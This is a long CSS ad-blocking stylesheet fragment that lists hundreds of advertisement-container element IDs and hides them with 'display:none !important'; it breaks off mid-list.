#ad336x280,#ad375x85,#ad468,#ad468x60,#ad468x60_top,#ad526x250,#ad600,#ad728,#ad728Mid,#ad728Top,#ad728Wrapper,#ad728top,#ad728x90,#ad728x90_1,#ad90,#adBadges,#adBanner,#adBanner10,#adBanner120x600,#adBanner160x600,#adBanner2,#adBanner3,#adBanner336x280,#adBanner4,#adBanner728,#adBanner9,#adBannerTable,#adBannerTop,#adBar,#adBelt,#adBlock125,#adBlockTop,#adBlocks,#adBottbanner,#adBox,#adBox11,#adBox16,#adBox350,#adBox390,#adCirc300X200,#adCirc_620_100,#adCol,#adColumn,#adCompanionSubstitute,#adComponentWrapper,#adContainer,#adContainer_1,#adContainer_2,#adContainer_3,#adDiv,#adDiv300,#adDiv728,#adFiller,#adFps,#adFtofrs,#adGallery,#adGoogleText,#adGroup1,#adHeader,#adHeaderTop,#adIsland,#adLB,#adLabel,#adLayer,#adLeader,#adLeaderTop,#adLeaderboard,#adMPU,#adMediumRectangle,#adMiddle0Frontpage,#adMiniPremiere,#adMonster1,#adOuter,#adPlaceHolderRight,#adPlacer,#adPosOne,#adRight,#adRight2,#adSPLITCOLUMNTOPRIGHT,#adSenseModule,#adSenseWrapper,#adServer_marginal,#adShortTower,#adSidebar,#adSidebarSq,#adSky,#adSkyscraper,#adSlider,#adSpace,#adSpace0,#adSpace1,#adSpace10,#adSpace11,#adSpace12,#adSpace13,#adSpace14,#adSpace15,#adSpace16,#adSpace17,#adSpace18,#adSpace19,#adSpace2,#adSpace20,#adSpace21,#adSpace22,#adSpace23,#adSpace24,#adSpace25,#adSpace3,#adSpace300_ifrMain,#adSpace4,#adSpace5,#adSpace6,#adSpace7,#adSpace8,#adSpace9,#adSpace_footer,#adSpace_right,#adSpace_top,#adSpacer,#adSpecial,#adSplotlightEm,#adSpot-Leader,#adSpot-banner,#adSpot-island,#adSpot-mrec1,#adSpot-sponsoredlinks,#adSpot-textbox1,#adSpot-widestrip,#adSpotAdvertorial,#adSpotIsland,#adSpotSponsoredLinks,#adSquare,#adStaticA,#adStrip,#adSuperAd,#adSuperPremiere,#adSuperSkyscraper,#adSuperbanner,#adTableCell,#adTag1,#adTag2,#adText,#adTextCustom,#adTextLink,#adText_container,#adTile,#adTop,#adTopContent,#adTopbanner,#adTopboxright,#adTower,#adUnit,#adWrapper,#adZoneTop,#ad_1,#ad_130x250_inhouse,#ad_160x160,#ad_160x600,#ad_190x90,#ad_2,#ad_3,#ad_300,#ad_300_250,#ad_300_250_1,#ad_300a,#ad_300b,#ad_300c,#ad_300x100_m_c,#ad_300x250,#ad_300x250_content_column,#ad_300x250_m_c,#ad_300x250m,#ad_300x90,#ad_4,#ad_468_60,#ad_468x60,#ad_5,#ad_728_foot,#ad_728x90,#ad_728x90_container,#ad_940,#ad_984,#ad_A,#ad_B,#ad_Banner,#ad_C,#ad_C2,#ad_D,#ad_E,#ad_F,#ad_G,#ad_H,#ad_I,#ad_J,#ad_K,#ad_L,#ad_M,#ad_N,#ad_O,#ad_P,#ad_YieldManager-300x250,#ad_YieldManager-728x90,#ad_adsense,#ad_after_navbar,#ad_anchor,#ad_area,#ad_banner,#ad_bannerManage_1,#ad_banner_top,#ad_banners,#ad_bar,#ad_bellow_post,#ad_bigsize_wrapper,#ad_block_1,#ad_block_2,#ad_bottom,#ad_box,#ad_box_colspan,#ad_box_top,#ad_branding,#ad_bs_area,#ad_buttons,#ad_center_monster,#ad_circ300x250,#ad_cna2,#ad_cont,#ad_container,#ad_container_0,#ad_container_marginal,#ad_container_side,#ad_container_sidebar,#ad_container_top,#ad_content_top,#ad_content_wrap,#ad_feature,#ad_firstpost,#ad_footer,#ad_frame,#ad_front_three,#ad_fullbanner,#ad_gallery,#ad_global_header,#ad_h3,#ad_haha_1,#ad_haha_4,#ad_halfpage,#ad_head,#ad_header,#ad_holder,#ad_horizontal,#ad_horseshoe_left,#ad_horseshoe_right,#ad_horseshoe_spacer,#ad_horseshoe_top,#ad_hotpots,#ad_in_arti,#ad_island,#ad_label,#ad_large_rectangular,#ad_lastpost,#ad_layer,#ad_layer2,#ad_leader,#ad_leaderBoard,#ad_leaderboard,#ad_leaderboard728x90,#ad_leaderboard_top,#ad_left,#ad_lnk,#ad_lrec,#ad_lwr_square,#ad_main,#ad_medium_rectangle,#ad_medium_rectangular,#ad_mediumrectangle,#ad_menu_header,#ad_message,#ad_middle,#ad_most_pop_234x60_req_wrapper,#ad_mpu,#ad_mpu300x250,#ad_mpuav,#ad_mrcontent,#ad_newsletter,#ad_overlay,#ad_place,#ad_play_300,#ad_rect,#ad_rect_body,#ad_rect_bottom,#ad_rectangle,#ad_rectangle_medium,#ad_related_links_div,#ad_related_links_div_program,#ad_replace_div_0,#ad_replace_div_1,#ad_report_leaderboard,#ad_report_rectangle,#ad_results,#ad_right,#ad_right_main,#ad_ros_tower,#ad_rr_1,#ad_script_head,#ad_sec,#ad_sec_div,#ad_sgd,#ad_sidebar,#ad_sidebar1,#ad_sidebar2,#ad_sidebar3,#ad_sky,#ad_skyscraper,#ad_skyscraper160x600,#ad_skyscraper_text,#ad_slot_leaderboard,#ad_slot_livesky,#ad_slot_sky_top,#ad_space,#ad_square,#ad_ss,#ad_table,#ad_term_bottom_place,#ad_text:not(textarea),#ad_thread_first_post_content,#ad_top,#ad_top_holder,#ad_tp_banner_1,#ad_tp_banner_2,#ad_txt,#ad_unit,#ad_vertical,#ad_wide,#ad_wide_box,#ad_widget,#ad_window,#ad_wrap,#ad_wrapper,#adaptvcompanion,#adbForum,#adbanner,#adbar,#adbig,#adbnr,#adboard,#adbody,#adbottom,#adbox,#adbox1,#adbox2,#adbutton,#adclear,#adcode,#adcode1,#adcode2,#adcode3,#adcode4,#adcolumnwrapper,#adcontainer,#adcontainer1,#adcontainerRight,#adcontainsm,#adcontent,#adcontent1,#adcontrolPushSite,#add_ciao2,#addbottomleft,#addiv-bottom,#addiv-top,#adfooter,#adfooter_728x90,#adframe:not(frameset),#adhead,#adhead_g,#adheader,#adhome,#adiframe1_iframe,#adiframe2_iframe,#adiframe3_iframe,#adimg,#adition_content_ad,#adlabel,#adlabelFooter,#adlayer,#adlayerContainer,#adlayer_back,#adlayerad,#adleaderboard,#adleaderboard_flex,#adleaderboardb,#adleaderboardb_flex,#adleft,#adlinks,#adlinkws,#adlrec,#admanager_leaderboard,#admid,#admiddle3center,#admiddle3left,#adposition,#adposition-C,#adposition-FPMM,#adposition1,#adposition2,#adposition3,#adposition4,#adrectangle,#adrectanglea,#adrectanglea_flex,#adrectangleb,#adrectangleb_flex,#adrig,#adright,#adright2,#adrighthome,#ads-250,#ads-468,#ads-area,#ads-block,#ads-bot,#ads-bottom,#ads-col,#ads-dell,#ads-footer,#ads-footer-inner,#ads-horizontal,#ads-indextext,#ads-leaderboard1,#ads-lrec,#ads-main,#ads-menu,#ads-middle,#ads-prices,#ads-rhs,#ads-right,#ads-sponsored-boxes,#ads-top,#ads-vers7,#ads-wrapper,#ads120,#ads125,#ads160left,#ads300,#ads300-250,#ads300Bottom,#ads300Top,#ads315,#ads336x280,#ads728,#ads728bottom,#ads728top,#ads790,#adsBox-460_left,#adsBox-dynamic-right,#adsBoxResultsPage,#adsContent,#adsDisplay,#adsDiv1,#adsDiv2,#adsDiv3,#adsDiv4,#adsDiv5,#adsDiv6,#adsDiv7,#adsHeader,#adsID,#ads_160,#ads_300,#ads_728,#ads_banner,#ads_belowforumlist,#ads_belownav,#ads_bottom,#ads_bottom_inner,#ads_bottom_outer,#ads_box,#ads_button,#ads_catDiv,#ads_container,#ads_footer,#ads_fullsize,#ads_halfsize,#ads_header,#ads_html1,#ads_html2,#ads_inner,#ads_lb,#ads_medrect,#ads_notice,#ads_right,#ads_right_sidebar,#ads_sidebar_roadblock,#ads_space,#ads_text,#ads_top,#ads_topbanner,#ads_watch_top_square,#ads_zone27,#adsbottom,#adsbox,#adsbox-left,#adsbox-right,#adscolumn,#adsd_contentad_r1,#adsd_contentad_r2,#adsd_contentad_r3,#adsd_topbanner,#adsd_txt_sky,#adsdiv,#adsection,#adsense,#adsense-2,#adsense-header,#adsense-new,#adsense-tag,#adsense-text,#adsense03,#adsense04,#adsense05,#adsense1,#adsenseLeft,#adsenseOne,#adsenseWrap,#adsense_article_left,#adsense_block,#adsense_box,#adsense_box_video,#adsense_inline,#adsense_leaderboard,#adsense_overlay,#adsense_placeholder_2,#adsenseheader,#adsensetopplay,#adsensewidget-3,#adserv,#adshometop,#adsimage,#adskinlink,#adsky,#adskyscraper,#adslider,#adslot,#adsmiddle,#adsonar,#adspace,#adspace-1,#adspace-300x250,#adspace-leaderboard-top,#adspace300x250,#adspaceBox,#adspaceBox300,#adspace_header,#adspace_leaderboard,#adspacer,#adsponsorImg,#adspot,#adspot-1,#adspot-149x170,#adspot-1x4,#adspot-2,#adspot-295x60,#adspot-2a,#adspot-2b,#adspot-300x110-pos-1,#adspot-300x125,#adspot-300x250-pos-1,#adspot-300x250-pos-2,#adspot-468x60-pos-2,#adspot-a,#adspot300x250,#adspot_220x90,#adspot_300x250,#adspot_468x60,#adspot_728x90,#adsquare,#adsright,#adstop,#adtab,#adtag_right_side,#adtagfooter,#adtagheader,#adtagrightcol,#adtaily-widget-light,#adtech_0,#adtech_1,#adtech_2,#adtech_3,#adtech_googleslot_03c,#adtech_takeover,#adtext,#adtop,#adtophp,#adtxt,#adv-300,#adv-leaderboard,#adv-left,#adv-masthead,#adv-middle,#adv-mpux,#adv-x36,#adv-x37,#adv-x38,#adv-x39,#adv-x40,#adv1,#adv300bottom { display:none !important; } #adv300top,#adv728,#adv_300,#adv_728,#adv_border,#adv_google_300,#adv_google_728,#adv_halfpage,#adv_halfpage_title,#adv_leaderboard,#adv_sky,#adv_top_banner_wrapper,#adver1,#adver2,#adver3,#adver4,#adver5,#adver6,#adver7,#advert-1,#advert-120,#advert-boomer,#advert-display,#advert-header,#advert-leaderboard,#advert-links-bottom,#advert-skyscraper,#advert-top,#advert1,#advertBanner,#advertContainer,#advertDB,#advertRight,#advertSection,#advert_125x125,#advert_250x250,#advert_box,#advert_home01,#advert_leaderboard,#advert_lrec_format,#advert_mid,#advert_mpu,#advert_mpu_1,#advert_right_skyscraper,#advert_sky,#advertbox,#advertbox2,#advertbox3,#advertbox4,#adverthome,#advertise,#advertise-here,#advertise-here-sidebar,#advertise-now,#advertise1,#advertiseHere,#advertisement1,#advertisement160x600,#advertisement3,#advertisement728x90,#advertisementHorizontal,#advertisementLigatus,#advertisementPrio2,#advertisementRight,#advertisementRightcolumn0,#advertisementRightcolumn1,#advertisementsarticle,#advertiser-container,#advertiserLinks,#advertisers,#advertising,#advertising-banner,#advertising-caption,#advertising-container,#advertising-control,#advertising-skyscraper,#advertising-top,#advertising2,#advertisingModule160x600,#advertisingModule728x90,#advertisingTopWrapper,#advertising_btm,#advertising_contentad,#advertising_horiz_cont,#advertisment,#advertismentElementInUniversalbox,#advertorial,#advertorial_red_listblock,#adverts,#adverts-top-container,#adverts-top-left,#adverts-top-middle,#adverts-top-right,#advertsingle,#advertspace,#advheader,#advsingle,#advt,#advtext,#advtop,#adwhitepaperwidget,#adwin_rec,#adwith,#adwords-4-container,#adwrapper,#adxBigAd,#adxMiddle5,#adxSponLink,#adxSponLinkA,#adxtop,#adxtop2,#adzbanner,#adzerk,#adzerk1,#adzerk2,#adzone,#adzoneBANNER,#adzoneheader,#afc-container,#affinityBannerAd,#after-content-ads,#after-header-ad-left,#after-header-ad-right,#after-header-ads,#agi-ad300x250,#agi-ad300x250overlay,#agi-sponsored,#alert_ads,#anchorAd,#annoying_ad,#ap_adframe,#ap_cu_overlay,#ap_cu_wrapper,#apiBackgroundAd,#apiTopAdWrap,#apmNADiv,#apolload,#araHealthSponsorAd,#area-adcenter,#area1ads,#article-ad,#article-ad-container,#article-box-ad,#articleAdReplacement,#articleLeftAdColumn,#articleSideAd,#article_ad,#article_ad_container,#article_box_ad,#articlead1,#articlead2,#asideads,#asinglead,#atlasAdDivGame,#awds-nt1-ad,#babAdTop,#banner-300x250,#banner-ad,#banner-ad-container,#banner-ads,#banner250x250,#banner300x250,#banner468x60,#banner728x90,#bannerAd,#bannerAdTop,#bannerAdWrapper,#bannerAd_ctr,#bannerAd_rdr,#banner_160x600,#banner_300_250,#banner_ad,#banner_ad_footer,#banner_ad_module,#banner_admicro,#banner_ads,#banner_advertisement,#banner_content_ad,#banner_topad,#bannerad,#bannerad2,#baseAdvertising,#basket-adContainer,#bbccom_mpu,#bbo_ad1,#bg-footer-ads,#bg-footer-ads2,#bg_YieldManager-160x600,#bg_YieldManager-300x250,#bg_YieldManager-728x90,#bigAd,#bigBoxAd,#bigad300outer,#bigadbox,#bigadframe,#bigadspot,#billboard_ad,#block-ad_cube-1,#block-openads-0,#block-openads-1,#block-openads-2,#block-openads-3,#block-openads-4,#block-openads-5,#block-spti_ga-spti_ga_adwords,#block-thewrap_ads_250x300-0,#block_advert,#block_advertisement,#blog-ad,#blog_ad_content,#blog_ad_opa,#blog_ad_right,#blog_ad_top,#blox-big-ad,#blox-big-ad-bottom,#blox-big-ad-top,#blox-halfpage-ad,#blox-tile-ad,#blox-tower-ad,#body_728_ad,#book-ad,#botad,#bott_ad2,#bott_ad2_300,#bottom-ad,#bottom-ad-container,#bottom-ad-tray,#bottom-ad-wrapper,#bottom-ads,#bottomAd,#bottomAdCCBucket,#bottomAdContainer,#bottomAdSense,#bottomAdSenseDiv,#bottomAds,#bottomAdvBox,#bottomContentAd,#bottomRightAd,#bottomRightAdSpace,#bottom_ad,#bottom_ad_area,#bottom_ad_unit,#bottom_ads,#bottom_banner_ad,#bottom_overture,#bottom_sponsor_ads,#bottom_sponsored_links,#bottom_text_ad,#bottomad,#bottomads,#bottomadsense,#bottomadwrapper,#bottomleaderboardad,#box-ad-section,#box-ads-small-1,#box-ads-small-2,#box-content-ad,#box-googleadsense-1,#box-googleadsense-r,#box1ad,#boxAd300,#boxAdContainer,#boxAdvert,#box_ad,#box_advertisment,#box_mod_googleadsense,#boxad1,#boxad2,#boxad3,#boxad4,#boxad5,#boxads,#bpAd,#bps-header-ad-container,#btnAds,#btnads,#btr_horiz_ad,#burn_header_ad,#button-ads-horizontal,#button-ads-vertical,#buttonAdWrapper1,#buttonAdWrapper2,#buttonAds,#buttonAdsContainer,#button_ad_container,#button_ad_wrap,#button_ads,#buttonad,#buy-sell-ads,#c4ad-Middle1,#c_ad_sb,#c_ad_sky,#caAdLarger,#catad,#category-ad,#cellAd,#channel_ad,#channel_ads,#ciHomeRHSAdslot,#circ_ad,#closeable-ad,#cmn_ad_box,#cmn_toolbar_ad,#cnnAboveFoldBelowAd,#cnnRR336ad,#cnnSponsoredPods,#cnnTopAd,#cnnVPAd,#col3_advertising,#colAd,#colRightAd,#collapseobj_adsection,#column4-google-ads,#comments-ad-container,#commercial_ads,#common_right_ad_wrapper,#common_right_lower_ad_wrapper,#common_right_lower_adspace,#common_right_lower_player_ad_wrapper,#common_right_lower_player_adspace,#common_right_player_ad_wrapper,#common_right_player_adspace,#common_right_right_adspace,#common_top_adspace,#comp_AdsLeaderboardTop,#companion-ad,#companionAd,#companionAdDiv,#companionad,#container-righttopads,#container-topleftads,#containerLocalAds,#containerLocalAdsInner,#containerMrecAd,#containerSqAd,#content-ad-header,#content-header-ad,#content-left-ad,#content-right-ad,#contentAd,#contentBoxad,#contentTopAds2,#content_ad,#content_ad_square,#content_ad_top,#content_ads_content,#content_box_300body_sponsoredoffers,#content_box_adright300_google,#content_lower_center_right_ad,#content_mpu,#contentad,#contentad_imtext,#contentad_right,#contentads,#contentinlineAd,#contents_post_ad,#contextad,#contextual-ads,#contextual-ads-block,#contextualad,#coverADS,#coverads,#ctl00_Adspace_Top_Height,#ctl00_BottomAd,#ctl00_ContentMain_BanManAd468_BanManAd,#ctl00_ContentPlaceHolder1_blockAdd_divAdvert,#ctl00_ContentRightColumn_RightColumn_Ad1_BanManAd,#ctl00_ContentRightColumn_RightColumn_Ad2_BanManAd,#ctl00_ContentRightColumn_RightColumn_PremiumAd1_ucBanMan_BanManAd,#ctl00_LHTowerAd,#ctl00_LeftHandAd,#ctl00_MasterHolder_IBanner_adHolder,#ctl00_TopAd,#ctl00_TowerAd,#ctl00_VBanner_adHolder,#ctl00__Content__RepeaterReplies_ctl03__AdReply,#ctl00_abot_bb,#ctl00_adFooter,#ctl00_advert_LargeMPU_div_AdPlaceHolder,#ctl00_atop_bt,#ctl00_cphMain_hlAd1,#ctl00_cphMain_hlAd2,#ctl00_cphMain_hlAd3,#ctl00_ctl00_MainPlaceHolder_itvAdSkyscraper,#ctl00_ctl00_ctl00_Main_Main_PlaceHolderGoogleTopBanner_MPTopBannerAd,#ctl00_ctl00_ctl00_Main_Main_SideBar_MPSideAd,#ctl00_dlTilesAds,#ctl00_m_skinTracker_m_adLBL,#ctl00_phCrackerMain_ucAffiliateAdvertDisplayMiddle_pnlAffiliateAdvert,#ctl00_phCrackerMain_ucAffiliateAdvertDisplayRight_pnlAffiliateAdvert,#ctl00_topAd,#ctrlsponsored,#cubeAd,#cube_ads,#cube_ads_inner,#cubead,#cubead-2,#currencies-sponsored-by,#custom-advert-leadboard-spacer,#dAdverts,#dItemBox_ads,#dart_160x600,#dc-display-right-ad-1,#dcadSpot-Leader,#dcadSpot-LeaderFooter,#dcol-sponsored,#defer-adright,#detail_page_vid_topads,#div-gpt-ad-1,#div-gpt-ad-2,#div-gpt-ad-3,#div-gpt-ad-4,#divAd,#divAdBox,#divAdWrapper,#divAdvertisement,#divBottomad1,#divBottomad2,#divDoubleAd,#divLeftAd12,#divLeftRecAd,#divMenuAds,#divWNAdHeader,#divWrapper_Ad,#div_ad_leaderboard,#div_video_ads,#dlads,#dni-header-ad,#dnn_adLeaderBoard2008,#dnn_ad_banner,#download_ads,#dp_ads1,#ds-mpu,#ds_ad_north_leaderboard,#editorsmpu,#em_ad_superbanner,#embedded-ad,#evotopTen_advert,#ex-ligatus,#exads,#extra-search-ads,#fb_adbox,#fb_rightadpanel,#featAds,#featuread,#featured-advertisements,#featuredAdContainer2,#featuredAds,#featured_ad_links,#feed_links_ad_container,#file_sponsored_link,#first-300-ad,#first-adlayer,#first_ad_unit,#firstad,#flAdData6,#fl_hdrAd,#flash_ads_1,#flexiad,#floatingAd,#floating_ad_container,#foot-ad-1,#footad,#footer-ad,#footer-ads,#footer-advert,#footer-adverts,#footer-sponsored,#footerAd,#footerAdDiv,#footerAds,#footerAdvertisement,#footerAdverts,#footer_ad,#footer_ad_01,#footer_ad_block,#footer_ad_container,#footer_ad_modules,#footer_ads,#footer_adspace,#footer_text_ad,#footerad,#footerads,#footeradsbox,#forum_top_ad,#four_ads,#fpad1,#fpad2,#fpv_companionad,#fr_ad_center,#frame_admain,#frnAdSky,#frnBannerAd,#frnContentAd,#front_ad728,#front_advert,#front_mpu,#ft-ad,#ft-ad-1,#ft-ad-container,#ft_mpu,#fullsizebanner_468x60,#fusionad,#fw-advertisement,#g_ad,#g_adsense,#ga_300x250,#galleries-tower-ad,#gallery-ad,#gallery-ad-m0,#gallery-random-ad,#gallery_ads,#game-info-ad,#gamead,#gameads,#gasense,#gglads,#global_header_ad_area,#gm-ad-lrec,#gmi-ResourcePageAd,#gmi-ResourcePageLowerAd,#goad1,#goads,#gooadtop,#google-ad,#google-ad-art,#google-ad-table-right,#google-ad-tower,#google-ads,#google-ads-bottom,#google-ads-header,#google-ads-left-side,#google-adsense-mpusize,#googleAd,#googleAdArea,#googleAds,#googleAdsSml,#googleAdsense,#googleAdsenseBanner,#googleAdsenseBannerBlog,#googleAdwordsModule,#googleAfcContainer,#googleSearchAds,#googleShoppingAdsRight,#googleShoppingAdsTop,#googleSubAds,#google_ad,#google_ad_container,#google_ad_inline,#google_ad_test,#google_ads,#google_ads_aCol,#google_ads_frame1,#google_ads_frame1_anchor,#google_ads_frame2,#google_ads_frame2_anchor,#google_ads_frame3,#google_ads_frame3_anchor,#google_ads_test,#google_ads_top,#google_adsense_home_468x60_1,#googlead,#googlead-sidebar-middle,#googlead-sidebar-top,#googlead2,#googleadbox,#googleads,#googleads_mpu_injection,#googleadsense,#googlesponsor,#gpt-ad-halfpage,#gpt-ad-rectangle1,#gpt-ad-rectangle2,#gpt-ad-skyscraper,#gpt-ad-story_rectangle3,#grid_ad,#gsyadrectangleload,#gsyadrightload,#gsyadtop,#gsyadtopload,#gtopadvts,#half-page-ad,#halfPageAd,#halfe-page-ad-box,#hd-ads,#hd-banner-ad,#hdtv_ad_ss,#head-ad,#head-ad-1,#head-banner468,#headAd,#head_ad,#head_advert,#headad,#header-ad,#header-ad-left,#header-ad-rectangle-container,#header-ad-right,#header-ad2010,#header-ads,#header-adspace,#header-advert,#header-advertisement,#header-advertising,#header-adverts,#header-banner-ad,#headerAd,#headerAdBackground,#headerAdContainer,#headerAdWrap,#headerAds,#headerAdsWrapper,#headerTopAd,#header_ad,#header_ad_728_90,#header_ad_container,#header_adcode,#header_ads,#header_advertisement_top,#header_flag_ad,#header_leaderboard_ad_container,#header_publicidad,#headerad,#headeradbox,#headerads,#headeradsbox,#headeradvertholder,#headeradwrap,#headline_ad,#headlinesAdBlock,#hiddenadAC,#hideads,#hl-sponsored-results,#hly_ad_side_bar_tower_left,#hly_inner_page_google_ad,#home-advert-module,#home-rectangle-ad,#home-top-ads,#homeMPU,#homeTopRightAd,#home_ad,#home_bottom_ad,#home_contentad,#home_feature_ad,#home_lower_center_right_ad,#home_mpu,#home_spensoredlinks,#homead,#homepage-ad,#homepageAdsTop,#homepageFooterAd,#homepage_right_ad,#homepage_right_ad_container,#homepage_top_ads,#hometop_234x60ad,#hor_ad,#horizad,#horizontal-banner-ad,#horizontal_ad,#horizontal_ad_top,#horizontalads,#hot-deals-ad,#houseAd,#hp-header-ad,#hp-mpu,#hp-right-ad,#hp-store-ad,#hpV2_300x250Ad,#hpV2_googAds,#hp_ad300x250,#ibt_local_ad728,#icePage_SearchLinks_AdRightDiv,#icePage_SearchLinks_DownloadToolbarAdRightDiv,#icePage_SearchResults_ads0_SponsoredLink,#icePage_SearchResults_ads1_SponsoredLink,#icePage_SearchResults_ads2_SponsoredLink,#icePage_SearchResults_ads3_SponsoredLink,#icePage_SearchResults_ads4_SponsoredLink,#idSponsoredresultend,#idSponsoredresultstart,#iframeRightAd,#iframeTopAd,#imu_ad_module,#in_serp_ad,#inadspace,#indexad,#inline-story-ad,#inlineAd,#inlinead,#inlinegoogleads,#inlist-ad-block,#inner-advert-row,#inner-top-ads,#innerpage-ad,#inside-page-ad,#insider_ad_wrapper,#instoryad,#instoryadtext,#instoryadwrap,#int-ad,#interstitial_ad_wrapper,#iqadtile8,#islandAd,#j_ad,#ji_medShowAdBox,#jmp-ad-buttons,#joead,#joead2,#js_adsense,#ka_adRightSkyscraperWide,#ka_samplead,#kaufDA-widget,#kdz_ad1,#kdz_ad2,#keyadvertcontainer,#landing-adserver,#lapho-top-ad-1,#largead,#lateAd,#layerAds_layerDiv,#layerTLDADSERV,#layer_ad_content,#layer_ad_main,#layerad,#leader-board-ad,#leaderAd,#leaderAdContainer,#leader_ad,#leader_board_ad,#leaderad,#leaderad_section,#leaderboard-ad,#leaderboard-bottom-ad,#leaderboardAd,#leaderboard_ad,#leaderboard_ad_gam,#left-ad-1,#left-ad-2,#left-ad-col,#left-ad-skin,#left-bottom-ad,#left-lower-adverts,#left-lower-adverts-container,#leftAdContainer,#leftAd_rdr,#leftAdvert,#leftSectionAd300-100,#left_ad,#left_adspace,#leftad,#leftads,#leftcolAd,#lg-banner-ad,#ligatus,#linkAds,#linkads,#live-ad,#localAds,#logoAd,#longAdSpace,#long_advertisement,#lowerAdvertisementImg,#lower_ad,#lowerads,#lowerthirdad,#lowertop-adverts,#lowertop-adverts-container,#lpAdPanel,#lrecad,#lsadvert-left_menu_1,#lsadvert-left_menu_2,#lsadvert-top,#mBannerAd,#main-ad,#main-ad160x600,#main-ad160x600-img,#main-ad728x90,#main-advert1,#main-advert2,#main-advert3,#main-bottom-ad,#main-tj-ad,#mainAd,#mainAdUnit,#mainAdvert,#mainAdvertismentP,#mainHeaderAdvertisment,#main_ad,#main_rec_ad,#main_top_ad_container,#marketing-promo,#mastAd,#mastAdvert,#mastad,#mastercardAd,#masthead_ad,#masthead_topad,#medRecAd,#media_ad,#mediaplayer_adburner,#mediumAdvertisement,#medrectad,#menuAds,#menubanner-ad-content,#mi_story_assets_ad,#mid-ad300x250,#mid-table-ad,#midRightTextAds,#mid_ad_div,#mid_ad_title,#mid_mpu,#midadd,#midadspace,#middle-ad,#middle_ad,#middle_body_advertising,#middlead,#middleads,#midrect_ad,#midstrip_ad,#mini-ad,#mochila-column-right-ad-300x250,#mochila-column-right-ad-300x250-1,#module-google_ads,#module_ad,#module_box_ad,#module_sky_scraper,#monsterAd,#moogleAd,#moreads,#most_popular_ad,#motionAd,#mpu-advert,#mpu-cont,#mpu300250,#mpuAd,#mpuDiv,#mpuSlot,#mpuWrapper,#mpuWrapperAd,#mpu_banner,#mpu_firstpost,#mpu_holder,#mpu_text_ad,#mpuad,#mpubox,#mr_banner_topad,#mrecAdContainer,#msAds,#ms_ad,#msad,#multiLinkAdContainer,#multi_ad,#my-ads,#myads_HeaderButton,#n_sponsor_ads,#namecom_ad_hosting_main,#narrow-ad,#narrow_ad_unit,#natadad300x250,#national_microlink_ads,#nationalad,#navi_banner_ad_780,#nba160PromoAd,#nba300Ad,#nbaGI300ad,#nbaHouseAnd600Ad,#nbaLeft600Ad,#nbaMidAds,#nbaVid300Ad,#nbcAd300x250,#new_topad,#newads,#news_advertorial_content,#news_advertorial_top,#ng_rtcol_ad,#noresults_ad_container,#noresultsads,#northad,#northbanner-advert,#northbanner-advert-container,#ns_ad1,#ns_ad2,#ns_ad3,#oanda_ads,#onespot-ads,#online_ad,#ovadsense,#p-googleadsense,#page-header-ad,#page-top-ad,#pageAds,#pageAdsDiv,#pageBannerAd,#page_ad,#page_content_top_ad,#pagelet_adbox,#pagelet_netego_ads,#pagelet_search_ads2,#panelAd,#pb_report_ad,#pcworldAdBottom,#pcworldAdTop,#pinball_ad,#player-below-advert,#player_ad,#player_ads,#pmad-in1,#pod-ad-video-page,#populate_ad_bottom,#populate_ad_left,#popup_domination_lightbox_wrapper,#portlet-advertisement-left,#portlet-advertisement-right,#post-promo-ad,#post5_adbox,#post_ad,#premium_ad,#priceGrabberAd,#prime-ad-space,#print-header-ad,#print_ads,#printads,#product-adsense,#promo-ad,#promoAds,#ps-vertical-ads,#pub468x60,#publicidad,#pushdown_ad,#qm-ad-big-box,#qm-ad-sky,#qm-dvdad,#quigo_ad,#r1SoftAd,#rail_ad1,#rail_ad2,#realEstateAds,#rectAd,#rect_ad,#rectangle-ad,#rectangleAd,#rectangle_ad,#refine-300-ad,#region-node-advert,#region-top-ad,#relocation_ad_container,#rh-ad-container,#rh_tower_ad,#rhapsodyAd,#rhs_ads,#rhsadvert,#right-ad,#right-ad-col,#right-ad-skin,#right-ad-title,#right-ad1,#right-ads-3,#right-advert,#right-bar-ad,#right-box-ad,#right-featured-ad,#right-mpu-1-ad-container,#right-uppder-adverts,#right-uppder-adverts-container,#rightAd,#rightAd300x250,#rightAd300x250Lower,#rightAdBar,#rightAdColumn,#rightAd_rdr,#rightAdsDiv,#rightColAd,#rightColumnMpuAd,#rightColumnSkyAd,#right_ad,#right_ad_wrapper,#right_ads,#right_advert,#right_advertisement,#right_advertising,#right_column_ad_container,#right_column_ads,#right_column_adverts,#right_column_internal_ad_container,#right_column_top_ad_unit,#rightad,#rightadContainer,#rightads,#rightadvertbar-doubleclickads,#rightbar-ad,#rightcolhouseads,#rightcolumn_300x250ad,#rightgoogleads,#rightinfoad,#rightside-ads,#rightside_ad,#righttop-adverts,#righttop-adverts-container,#rm_ad_text { display:none !important; } #ros_ad,#rotatingads,#row2AdContainer,#rprightHeaderAd,#rr_MSads,#rt-ad,#rt-ad-top,#rt-ad468,#rtMod_ad,#rtmod_ad,#sAdsBox,#sb-ad-sq,#sb_ad_links,#sb_advert,#search-google-ads,#search-sponsored-links,#search-sponsored-links-top,#searchAdSenseBox,#searchAdSenseBoxAd,#searchAdSkyscraperBox,#search_ads,#search_result_ad,#sec_adspace,#second-adlayer,#secondBoxAdContainer,#secondrowads,#sect-ad-300x100,#sect-ad-300x250-2,#section-ad-1-728,#section-ad-300-250,#section-ad-4-160,#section-blog-ad,#section-container-ddc_ads,#section_advertisements,#section_advertorial_feature,#servfail-ads,#sew-ad1,#shoppingads,#shortads,#show-ad,#showAd,#showad,#side-ad,#side-ad-container,#side-ads,#sideAd,#sideAd1,#sideAd2,#sideAdSub,#sideAds,#sideBarAd,#side_ad,#side_ad_wrapper,#side_ads_by_google,#side_sky_ad,#sidead,#sideads,#sideadtop-to,#sidebar-125x125-ads,#sidebar-125x125-ads-below-index,#sidebar-ad,#sidebar-ad-boxes,#sidebar-ad-space,#sidebar-ad-wrap,#sidebar-ad3,#sidebar-ads,#sidebar-adv,#sidebar-sponsor-link,#sidebar2ads,#sidebar_ad,#sidebar_ad_widget,#sidebar_ads,#sidebar_ads_180,#sidebar_sponsoredresult_body,#sidebar_txt_ad_links,#sidebarad,#sidebaradpane,#sidebarads,#sidebaradver_advertistxt,#sideline-ad,#single-mpu,#singlead,#site-ad-container,#site-leaderboard-ads,#site_top_ad,#sitead,#sky-ad,#skyAd,#skyAdContainer,#skyScrapperAd,#skyWrapperAds,#sky_ad,#sky_advert,#skyads,#skyadwrap,#skyline_ad,#skyscrapeAd,#skyscraper-ad,#skyscraperAd,#skyscraperAdContainer,#skyscraper_ad,#skyscraper_advert,#skyscraperad,#slide_ad,#sliderAdHolder,#slideshow_ad_300x250,#sm-banner-ad,#small_ad,#small_ad_banners_